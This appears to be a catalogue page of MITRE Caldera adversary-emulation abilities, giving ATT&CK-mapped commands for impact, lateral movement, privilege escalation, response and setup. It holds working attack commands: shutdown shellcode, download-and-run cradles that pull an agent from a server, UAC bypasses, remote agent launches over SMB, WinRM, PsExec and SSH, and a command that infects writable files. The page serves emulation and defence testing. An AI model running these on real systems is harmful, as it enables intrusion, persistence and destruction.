Home/Caldera abilities

Caldera emulation abilities

211 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
All tactics build-capabilities · 1 collection · 16 command-and-control · 6 credential-access · 10 defense-evasion · 15 detection · 8 discovery · 67 execution · 9 exfiltration · 13 hunt · 4 impact · 8 lateral-movement · 10 persistence · 3 privilege-escalation · 8 response · 14 setup · 10 technical-information-gathering · 1 training · 6 verification · 2

Abilities

50 shown of 211
impact ["darwin", "linux", "windows"] T1499 · Endpoint Denial of Service ↗
Disrupt WIFI
Turn a computers WIFI off
Show command 
[{"platform": "darwin", "executor": "sh", "command": "./wifi.sh off\n"}, {"platform": "linux", "executor": "sh", "command": "./wifi.sh off\n"}, {"platform": "windows", "executor": "psh", "command": ".\\wifi.ps1 -Off\n"}]
impact ["darwin", "linux", "windows"] T1565.001 · Data Manipulation: Stored Data Manipulation ↗
File Hunter Mission
Hunts for files of a certain extension and inserts a message
Show command 
[{"platform": "darwin", "executor": "sh", "command": "./mission.go -duration 60 -extension .caldera -dir '/'"}, {"platform": "linux", "executor": "sh", "command": "./mission.go -duration 60 -extension .caldera -dir '/'"}, {"platform": "windows", "executor": "cmd", "command": "copy mission.go mission.exe &&mission.exe -duration 60 -extension .caldera -dir C:\\"}, {"platform": "windows", "executor": "psh", "command": "mv mission.go mission.exe;.\\mission.exe -duration 60 -extension .caldera -dir 'C:\\';"}]
impact ["windows"] T1491 · Defacement ↗
Invoke-MemeKatz
Downloads random meme and sets as desktop background
Show command 
[{"platform": "windows", "executor": "psh,pwsh", "command": ".\\Invoke-MemeKatz.ps1\n"}, {"platform": "windows", "executor": "cmd", "command": "powershell.exe -ep bypass -c \"Invoke-MemeKatz.ps1\"\n"}]
impact ["darwin", "linux", "windows"] T1491 · Defacement ↗
Leave note
Create a text file for the user to find
Show command 
[{"platform": "darwin", "executor": "sh", "command": "echo \"proof that this machine was hacked.\" > message.txt\n"}, {"platform": "linux", "executor": "sh", "command": "echo \"proof that this machine was hacked.\" > message.txt\n"}, {"platform": "windows", "executor": "psh", "command": "Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'\n"}]
impact ["darwin"] T1489 · Service Stop ↗
Quit Outlook
Quit Outlook
Show command 
[{"platform": "darwin", "executor": "osa", "command": "quit app \"Microsoft Outlook.app\""}]
Record microphone
Install sox and record microphone for n-seconds
Show command 
[{"platform": "darwin", "executor": "sh", "command": "brew install sox >/dev/null 2>&1;\nsox -d recording.wav trim 0 15 >/dev/null 2>&1;\n"}]
Shutdown Target System
Force shutdown a target system using Process Injection and raw shellcode
Show command 
[{"platform": "linux", "executor": "shellcode_amd64,shellcode_386", "command": "0x48, 0x31, 0xc0, 0x48, 0x31, 0xd2, 0x50, 0x6a, 0x77, 0x66, 0x68, 0x6e, 0x6f, 0x48, 0x89, 0xe3, 0x50, 0x66, 0x68, 0x2d, 0x68, 0x48, 0x89, 0xe1, 0x50, 0x49, 0xb8, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x49, 0xba, 0x73, 0x68, 0x75, 0x74, 0x64, 0x6f, 0x77, 0x6e, 0x41, 0x52, 0x41, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x53, 0x51, 0x57, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xc0, 0x3b, 0x0f, 0x05\n"}]
Copy 54ndc47 (SMB)
Copy 54ndc47 to remote host (SMB)
Show command 
[{"platform": "windows", "executor": "psh", "command": "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n"}]
lateral-movement ["windows", "darwin", "linux"] T1570 · Lateral Tool Transfer ↗
Copy 54ndc47 (WinRM and SCP)
Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP
Show command 
[{"platform": "windows", "executor": "psh,pwsh", "command": "$job = Start-Job -ScriptBlock {\n  $username = \"#{domain.user.name}\";\n  $password = \"#{domain.user.password}\";\n  $secstr = New-Object -TypeName System.Security.SecureString;\n  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n  $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n  $location = \"#{location}\";\n  $exe = \"#{exe_name}\";\n  Copy-Item $location -Destination \"C:\\Users\\Public\\svchost.exe\" -ToSession $session;\n  Start-Sleep -s 5;\n  Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n"}, {"platform": "darwin", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go\n"}, {"platform": "linux", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go\n"}]
Copy Sandcat File using Powershell
Copy Sandcat file using PowerShell
Show command 
[{"platform": "windows", "executor": "psh", "command": "$server=\"#{server}\";\n$sharePath=\"#{share}\";\nSet-Location $sharePath;$url=\"$($server)/file/download\";\n$wc=New-Object System.Net.WebClient;$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");($data=$wc.DownloadData($url)) -and\n($name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"))\n-and ([io.file]::WriteAllBytes(\"$($sharePath)$name.exe\",$data));\n$startServer=\"$($sharePath)$name.exe -server $($server) \";Invoke-Command\n-ScriptBlock {Param([string]$startServer, $sharePath, $name, $server)  Invoke-WmiMethod\n-Class Win32_Process -Name Create -ArgumentList \"$($sharePath)$name.exe\n-server $server -v\" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server\n"}]
lateral-movement ["windows"] T1570 · Lateral Tool Transfer ↗
Copy Sandcat File using PsExec on CMD
Copy Sandcat file using PsExec on CMD
Show command 
[{"platform": "windows", "executor": "cmd", "command": "net /y use \\\\#{remote.host.name} & copy /y sandcat.go-windows\n\\\\#{remote.host.name}\\Users\\Public & #{psexec.path} -accepteula \\\\#{remote.host.name}\ncmd /c start C:\\Users\\Public\\sandcat.go-windows -server #{server} -v\n"}]
lateral-movement []
Lateral Movement - Certutil
Uses CertUtil as a LoL technique to move the .exe agent as a certificate using windows-signed binaries
Show command 
[]
lateral-movement []
Lateral Movement - esentutl
Tool transfer to lateral hosts using Alternate Data Streams to hide implant
Show command 
[]
Mount Share
Mount a windows share
Show command 
[{"platform": "windows", "executor": "psh", "command": "net use \\\\#{remote.host.fqdn}\\C$ /user:#{domain.user.name} #{domain.user.password}\n"}]
Net use
Mounts a network file share on a target computer
Show command 
[{"platform": "windows", "executor": "psh", "command": "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n"}]
lateral-movement ["darwin", "linux"] T1021.004 · Remote Services: SSH ↗
Start 54ndc47
Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication
Show command 
[{"platform": "darwin", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n"}, {"platform": "linux", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n"}]
Start Agent (WinRM)
Start Agent using WinRM (WinRM)
Show command 
[{"platform": "windows", "executor": "psh", "command": "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\\Users\\Public\\svchost.exe -server #{server} }};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n"}]
persistence []
Create persistence cron job for current user
After target host is rebooted, it will automatically reach out to the caldera server to download and execute the caldera agent, creating persistent access after reboot.
Show command 
[]
persistence []
Create persistence cron job for root user (requires sudo)
After target host is rebooted, it will automatically reach out to the caldera server to download and execute the caldera agent, creating persistent root access after reboot.
Show command 
[]
Replace a service binary with alternate binary
This is an example technique. snmptrap.exe should be changed in the command below with the new desired service binary. Depending on the value of host.service.modifiable this ability can damage the target system.
Show command 
[{"platform": "windows", "executor": "psh", "command": "$s = Get-Service -Name #{host.service.modifiable};\nif ($s.status -ne 'Stopped') { Stop-Service $s };\n$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nCopy-Item -Path $path -Destination ($path + \".saved\");\nCopy-Item -Path \"C:\\Windows\\System32\\snmptrap.exe\" -Destination $path\n"}]
privilege-escalation []
Abuse Linux Capability: Python3
Use python3 to pull down Caldera agent as root
Show command 
[]
Bypass UAC Medium
Bypass user account controls - medium
Show command 
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\"; $wc=New-Object System.Net.WebClient; $wc.Headers.add(\"platform\",\"windows\"); $wc.Headers.add(\"file\",\"sandcat.go\"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"); [io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n$job = Start-Job -ScriptBlock { Import-Module -Name .\\Bypass-UAC.ps1; Bypass-UAC -Command \"C:\\Users\\Public\\$name.exe -group #{group}\"; };\nReceive-Job -Job $job -Wait;\n"}]
privilege-escalation []
SUID Find & Exploit
Finds all SUID binaries and executes relevant cmds
Show command 
[]
Slui File Handler Hijack
executes the slui exe file handler hijack
Show command 
[{"platform": "windows", "executor": "psh", "command": ".\\Akagi64.exe 45 C:\\Windows\\System32\\cmd.exe\n"}]
UAC bypass registry
Set a registry key to allow UAC bypass
Show command 
[{"platform": "windows", "executor": "psh", "command": "New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name EnableLUA -PropertyType DWord -Value 0 -Force\n"}]
Weak executable files
Locate and infect files with weak but executable perms
Show command 
[{"platform": "darwin", "executor": "sh", "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-darwin && sandcat.go-darwin\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n"}, {"platform": "linux", "executor": "sh", "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-linux && sandcat.go-linux\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n"}]
duser/osksupport DLL Hijack
UIPI bypass with uiAccess application
Show command 
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$wc.Headers.add(\"defaultSleep\",\"60\");\n$wc.Headers.add(\"defaultGroup\",\"bypassed_u_bro\");\n$data=$wc.DownloadData($url);\n$name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\");\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n.\\Akagi64.exe 32 \"C:\\Users\\Public\\$name.exe -server #{server}\"\n"}]
wow64log DLL Hijack
Dll Hijack of WOW64 logger wow64log.dll using Akagi.exe
Show command 
[{"platform": "windows", "executor": "cmd,psh", "command": ".\\Akagi64.exe 30 C:\\Windows\\System32\\cmd.exe\n"}]
response ["windows"] x · Query Event Logs ↗
Collect Child Processes
Collect child processes from Sysmon logs
Show command 
[{"platform": "windows", "executor": "psh", "command": "$time_range = (Get-Date) - (New-TimeSpan -Seconds $(#{sysmon.time.range}/1000));\nGet-WinEvent -FilterHashTable @{ Logname='Microsoft-Windows-Sysmon/Operational'; StartTime=$time_range; Id=1} | where -Property Message -Match '(?m)^ParentProcessGuid: {#{host.process.guid}}' | Format-List;\n"}, {"platform": "windows", "executor": "cmd", "command": "wevtutil qe Microsoft-Windows-Sysmon/Operational /q:\"*/System/TimeCreated[timediff(@SystemTime) <= #{sysmon.time.range}] and */EventData/Data[@Name='ParentProcessGuid']=#{host.process.guid} and Event[System[EventID=1]]\" /f:text\n"}]
response ["windows"] x · Query Event Logs ↗
Collect GUID from PID
Collect process GUIDs by querying Sysmon for all events associated with the given PID
Show command 
[{"platform": "windows", "executor": "psh", "command": "$time_range = (Get-Date) - (New-TimeSpan -Seconds $(#{sysmon.time.range}/1000));\nGet-WinEvent -FilterHashTable @{ Logname='Microsoft-Windows-Sysmon/Operational'; StartTime=$time_range; Id=1} | where -Property Message -Match '(?m)^ProcessId: #{host.process.id}\\b' | Format-List;\n"}, {"platform": "windows", "executor": "cmd", "command": "wevtutil qe Microsoft-Windows-Sysmon/Operational /q:\"*/System/TimeCreated[timediff(@SystemTime) <= #{sysmon.time.range}] and */EventData/Data[@Name='ProcessId']=#{host.process.id} /f:text\n"}]
response ["windows"] x · Query Event Logs ↗
Collect Grandchild Processes
Collect grandchild processes from Sysmon logs
Show command 
[{"platform": "windows", "executor": "psh", "command": "$time_range = (Get-Date) - (New-TimeSpan -Seconds $(#{sysmon.time.range}/1000));\nGet-WinEvent -FilterHashTable @{ Logname='Microsoft-Windows-Sysmon/Operational'; StartTime=$time_range; Id=1} | where -Property Message -Match '(?m)^ParentProcessId: #{host.process.childid}\\b' | Format-List;\n"}, {"platform": "windows", "executor": "cmd", "command": "wevtutil qe Microsoft-Windows-Sysmon/Operational /q:\"*/System/TimeCreated[timediff(@SystemTime) <= #{sysmon.time.range}] and */EventData/Data[@Name='ParentProcessId']=#{host.process.childid} and Event[System[EventID=1]]\" /f:text\n"}]
response ["windows"] x · Query Event Logs ↗
Collect Parent's Child Proccesses
Collect all process creation events with the given parent process GUID
Show command 
[{"platform": "windows", "executor": "psh", "command": "$time_range = (Get-Date) - (New-TimeSpan -Seconds $(#{sysmon.time.range}/1000));\nGet-WinEvent -FilterHashTable @{ Logname='Microsoft-Windows-Sysmon/Operational'; StartTime=$time_range; Id=1 } | where -Property Message -Match \"\\bParentProcessGuid: {#{host.process.parentguid}}\" | Format-List;\n"}, {"platform": "windows", "executor": "cmd", "command": "wevtutil qe Microsoft-Windows-Sysmon/Operational /q:\"*/System/TimeCreated[timediff(@SystemTime) <= #{sysmon.time.range}] and */System/EventID=1 and */EventData/Data[@Name='ParentProcessGuid']='#{host.process.parentguid}'\" /f:text"}]
response ["windows"] x · x ↗
Delete known suspicious files
Use hash of known suspicious file to find instances of said file, and delete instances
Show command 
[{"platform": "windows", "executor": "psh", "command": "Remove-Item -Path #{host.malicious.file} -Force;\n"}]
response ["windows"] T1065 · Uncommonly Used Port ↗
Enable Inbound TCP/UDP firewall rule
Blocks inbound TCP and UDP traffic on a specific port
Show command 
[{"platform": "windows", "executor": "psh, pwsh", "command": "New-NetFirewallRule -DisplayName \"Block in-bound UDP traffic to port #{host.port.unauthorized} from PID #{host.pid.unauthorized}\" -Group \"Caldira\" -Direction Inbound -Protocol UDP -Action Block -LocalPort #{host.port.unauthorized};\nNew-NetFirewallRule -DisplayName \"Block in-bound TCP traffic to port #{host.port.unauthorized} from PID #{host.pid.unauthorized}\" -Group \"Caldira\" -Direction Inbound -Protocol TCP -Action Block -LocalPort #{host.port.unauthorized};\n"}]
response ["windows"] T1065 · Uncommonly Used Port ↗
Enable Outbound TCP/UDP firewall rule
Blocks outbound TCP and UDP traffic on a specific port
Show command 
[{"platform": "windows", "executor": "psh, pwsh", "command": "New-NetFirewallRule -DisplayName \"Block out-bound UDP traffic to port #{remote.port.unauthorized} from PID #{host.pid.unauthorized}\" -Group \"Caldira\" -Direction Outbound -Protocol UDP -Action Block -RemotePort #{remote.port.unauthorized};\nNew-NetFirewallRule -DisplayName \"Block out-bound TCP traffic to port #{remote.port.unauthorized} from PID #{host.pid.unauthorized}\" -Group \"Caldira\" -Direction Outbound -Protocol TCP -Action Block -RemotePort #{remote.port.unauthorized};\n"}]
response ["linux", "darwin", "windows"] x · x ↗
Inoculate C2
Reroute suspicious IP addresses to localhost by editing hosts file
Show command 
[{"platform": "linux", "executor": "sh", "command": "if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi;\necho \"127.0.0.1    #{remote.suspicious.url}\" >> /etc/hosts;\n"}, {"platform": "darwin", "executor": "sh", "command": "if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi;\necho \"127.0.0.1    #{remote.suspicious.url}\" >> /etc/hosts;\n"}, {"platform": "windows", "executor": "psh", "command": "if (-not (Test-Path -Path .\\hosts_backup)) { Copy-Item -Path c:\\windows\\system32\\drivers\\etc\\hosts -Destination .\\hosts_backup; };\nAdd-Content c:\\windows\\system32\\drivers\\etc\\hosts \"127.0.0.1`t#{remote.suspicious.url}\";\n"}]
response ["linux", "darwin", "windows"] x · x ↗
Kill rogue process
Force kill any unauthorized processes
Show command 
[{"platform": "linux", "executor": "sh", "command": "kill -9 #{host.pid.unauthorized}\n"}, {"platform": "darwin", "executor": "sh", "command": "kill -9 #{host.pid.unauthorized}\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Stop-Process -Id #{host.pid.unauthorized} -Force\n"}, {"platform": "windows", "executor": "cmd", "command": "taskkill /pid #{host.pid.unauthorized} /f\n"}]
response ["linux", "darwin"] x · x ↗
Remove Unauthorized Cron Job
Removes newly added cron jobs
Show command 
[{"platform": "linux", "executor": "sh", "command": "crontab -u #{host.user.name} -l > temp_crontab;\nline_number=$(grep -n '#{host.new.cronjob}' temp_crontab | cut -d':' -f1);\nif [ $line_number ]; then\n  sed \"${line_number}d\" temp_crontab > new_crontab;\n  crontab -u #{host.user.name} new_crontab;\n  rm -f new_crontab;\nfi;\nrm -f temp_crontab new_crontab;\n"}, {"platform": "darwin", "executor": "sh", "command": "crontab -u #{host.user.name} -l > temp_crontab;\nline_number=$(grep -n '#{host.new.cronjob}' temp_crontab | cut -d':' -f1);\nif [ $line_number ]; then\n  sed \"${line_number}d\" temp_crontab > new_crontab;\n  crontab -u #{host.user.name} new_crontab;\n  rm -f new_crontab;\nfi;\nrm -f temp_crontab new_crontab;\n"}]
response ["windows"] x · x ↗
Remove Unauthorized Scheduled Task
Removes newly added scheduled tasks
Show command 
[{"platform": "windows", "executor": "psh", "command": "Unregister-ScheduledTask -TaskName #{host.new.schtask} -Confirm:$false\n"}]
response ["linux", "darwin", "windows"] x · x ↗
Restore File Backup
Restore backups of files if file has been modified
Show command 
[{"platform": "linux", "executor": "sh", "command": "cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path}\n"}, {"platform": "darwin", "executor": "sh", "command": "cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path}\n"}, {"platform": "windows", "executor": "psh", "command": "Copy-Item \"C:\\Users\\Public\\sensitive_file_backups\\#{file.backup.name}\" -Destination \"#{file.sensitive.path}\" -Force\n"}]
response ["linux", "darwin", "windows"] x · x ↗
Restore Modified Sensitive Directory
Restore sensitive directories with their backups if they have been modified
Show command 
[{"platform": "linux", "executor": "sh", "command": "directory=\"#{directory.sensitive.path}\";\nmkdir -p $directory;\nrm -r ${directory}/*;\ntar -xzf /tmp/sensitive_file_backups/#{directory.sensitive.backup} -C $directory;\n"}, {"platform": "darwin", "executor": "sh", "command": "directory=\"#{directory.sensitive.path}\";\nmkdir -p $directory;\nrm -r ${directory}/*;\ntar -xzf /tmp/sensitive_file_backups/#{directory.sensitive.backup} -C $directory;\n"}, {"platform": "windows", "executor": "psh", "command": "$directory = \"#{directory.sensitive.path}\";\nNew-Item -ItemType Directory -Force -Path $directory | Out-Null;\nRemove-Item -Path \"$($directory)\\*\" -Recurse -EA silentlycontinue;\nExpand-Archive -LiteralPath \"C:\\Users\\Public\\sensitive_file_backups\\#{directory.sensitive.backup}\" -DestinationPath \"$($directory)\\\";\n"}]
response ["windows"] x · Query Event Logs ↗
System Information from GUID
Collect system information from Sysmon event log given ProcessGUID. Ability timeout may need to be increased depending on Sysmon log size.
Show command 
[{"platform": "windows", "executor": "psh", "command": "$time_range = (Get-Date) - (New-TimeSpan -Seconds $(#{sysmon.time.range}/1000));\nGet-WinEvent -FilterHashTable @{ Logname='Microsoft-Windows-Sysmon/Operational'; StartTime=$time_range; } | select TimeCreated,Id,ProviderName,RecordId,ProcessId,MachineName,Message | where -Property Message -Match \"\\bProcessGuid: {#{host.process.guid}}\" | Format-List;\n"}, {"platform": "windows", "executor": "cmd", "command": "wevtutil qe Microsoft-Windows-Sysmon/Operational /q:\"*/System/TimeCreated[timediff(@SystemTime) <= #{sysmon.time.range}] and */EventData/Data[@Name='ProcessGuid']='#{host.process.guid}'\" /f:text\n"}]
setup ["linux", "darwin"] x · x ↗
Backup Bash Profiles
If bash profile doesn't exist, create it, and then backup each profile.
Show command 
[{"platform": "linux", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nuser_profiles=\".bashrc .bash_profile .bash_login .profile\";\noutput=\"\";\nhome_dir=$(echo \"/home/*\" | sed 's/\\\\\\*/\\*/g');\ndirs=$(find $home_dir -maxdepth 0 -type d);\ndirs=\"${dirs} /root\";\nfiles=\"\";\nfor dir in $dirs;\n  do for prof in $user_profiles;\n    do files=\"${files}${dir}/${prof} \";\n  done;\ndone;\nfiles=\"${files} /etc/profile /etc/bash.bashrc\";\nfor file in $files;\n  do if [ ! -f $file ];\n    then touch $file;\n  fi;\n  randname=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 13);\n  cp $file /tmp/sensitive_file_backups/$randname;\n  output=\"${output}${file}>${randname}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nuser_profiles=\".bashrc .bash_profile .bash_login .profile\";\noutput=\"\";\nhome_dir=$(echo \"/Users/*\" | sed 's/\\\\\\*/\\*/g');\ndirs=$(find $home_dir -maxdepth 0 -type d);\ndirs=\"${dirs} /var/root\";\nfiles=\"\";\nfor dir in $dirs;\n  do for prof in $user_profiles;\n    do files=\"${files}${dir}/${prof} \";\n  done;\ndone;\nfiles=\"${files} /etc/profile /etc/bash.bashrc\";\nfor file in $files;\n  do if [ ! -f $file ];\n    then touch $file;\n  fi;\n  randname=$(head /dev/urandom | LC_CTYPE=C tr -dc A-Za-z0-9 | head -c 13);\n  cp $file /tmp/sensitive_file_backups/$randname;\n  output=\"${output}${file}>${randname}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}]
setup ["windows"] x · x ↗
Backup Powershell Profiles
This ability creates backups of Powershell profiles, creating the profiles themselves if they do not exist.
Show command 
[{"platform": "windows", "executor": "psh", "command": "$files = @(\"$Profile\", \"$PsHome\\Profile.ps1\", \"$PsHome\\Microsoft.Powershell_profile.ps1\");\nNew-Item -ItemType Directory -Force -Path C:\\Users\\Public\\sensitive_file_backups | Out-Null;\n$output = '';\nForEach ($file in $files) {\n  if (-not (Test-Path $file)) {\n    New-Item -Path $file -ItemType File | Out-Null;\n  };\n  $randname = -join (( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 13 | % {[char]$_});\n  Copy-Item $file -Destination \"C:\\Users\\Public\\sensitive_file_backups\\$randname\";\n  $output = \"$($output)$($file)>$($randname)`n\"\n};\n$output\n"}]
setup ["linux", "darwin", "windows"] x · x ↗
Backup Sensitive Directories
Create compressed backups of sensitive directories
Show command 
[{"platform": "linux", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\ndir_path=$(echo \"#{directory.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\ndirectories=$(find $dir_path -maxdepth 0 -type d 2>/dev/null);\noutput=\"\";\nfor directory in $directories;\n  do if [ -z \"$(ls -A $directory)\" ]; then\n    touch \"${directory}/.bak\";\n  fi;\n  randname=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 13);\n  tar -czf /tmp/sensitive_file_backups/${randname}.tar.gz -C $directory .;\n  output=\"${output}${directory}>${randname}.tar.gz\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\ndir_path=$(echo \"#{directory.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\ndirectories=$(find $dir_path -maxdepth 0 -type d 2>/dev/null);\noutput=\"\";\nfor directory in $directories;\n  do if [ -z \"$(ls -A $directory)\" ]; then\n    touch \"${directory}/.bak\";\n  fi;\n  randname=$(head /dev/urandom | LC_CTYPE=C tr -dc A-Za-z0-9 | head -c 13);\n  tar -czf /tmp/sensitive_file_backups/${randname}.tar.gz -C $directory .;\n  output=\"${output}${directory}>${randname}.tar.gz\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "windows", "executor": "psh", "command": "New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\sensitive_file_backups | Out-Null;\n$output = '';\nGet-Item #{directory.sensitive.path} -EA silentlycontinue | Where-Object { $_ -is [System.IO.DirectoryInfo] } | foreach-object {\n  if ((Get-ChildItem $_.FullName -Force | Measure-Object).count -eq 0) {\n    echo '' > $($_.FullName + \"\\.bak\");\n  };\n  $randname = -join (( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 13 | % {[char]$_});\n  Compress-Archive -Force -Path $($_.FullName + \"\\*\") -DestinationPath $(\"C:\\Users\\Public\\sensitive_file_backups\\\" + $randname + \".zip\");\n  $output = \"$($output)$($_.FullName)>$($randname).zip`n\";\n};\n$output;\n"}]
setup ["linux", "darwin", "windows"] x · x ↗
Backup Sensitive Files
Backup sensitive files to temp directory in case these files are maliciously modified
Show command 
[{"platform": "linux", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nfilepath=$(echo \"#{file.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\nfiles=$(find $filepath -maxdepth 0 -type f 2>/dev/null);\noutput=\"\";\nfor file in $files;\n  do randname=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 13);\n  cp $file /tmp/sensitive_file_backups/$randname;\n  output=\"${output}${file}>${randname}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nfilepath=$(echo \"#{file.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\nfiles=$(find $filepath -maxdepth 0 -type f 2>/dev/null);\noutput=\"\";\nfor file in $files;\n  do randname=$(head /dev/urandom | LC_CTYPE=C tr -dc A-Za-z0-9 | head -c 13);\n  cp $file /tmp/sensitive_file_backups/$randname;\n  output=\"${output}${file}>${randname}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "windows", "executor": "psh", "command": "New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\sensitive_file_backups | Out-Null;\n$output = '';\nGet-Item #{file.sensitive.path} -EA silentlycontinue | Where-Object { -not ($_ -is [System.IO.DirectoryInfo]) } | foreach-object {\n  $randname = -join (( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 13 | % {[char]$_});\n  Copy-Item $_.FullName -Destination \"C:\\Users\\Public\\sensitive_file_backups\\$randname\";\n  $output = \"$($output)$($_.FullName)>$($randname)`n\"\n};\n$output;\n"}]
setup ["linux", "darwin"] x · x ↗
Hash Bash Profiles
If bash profile doesn't exist, create it, and then hash each profile.
Show command 
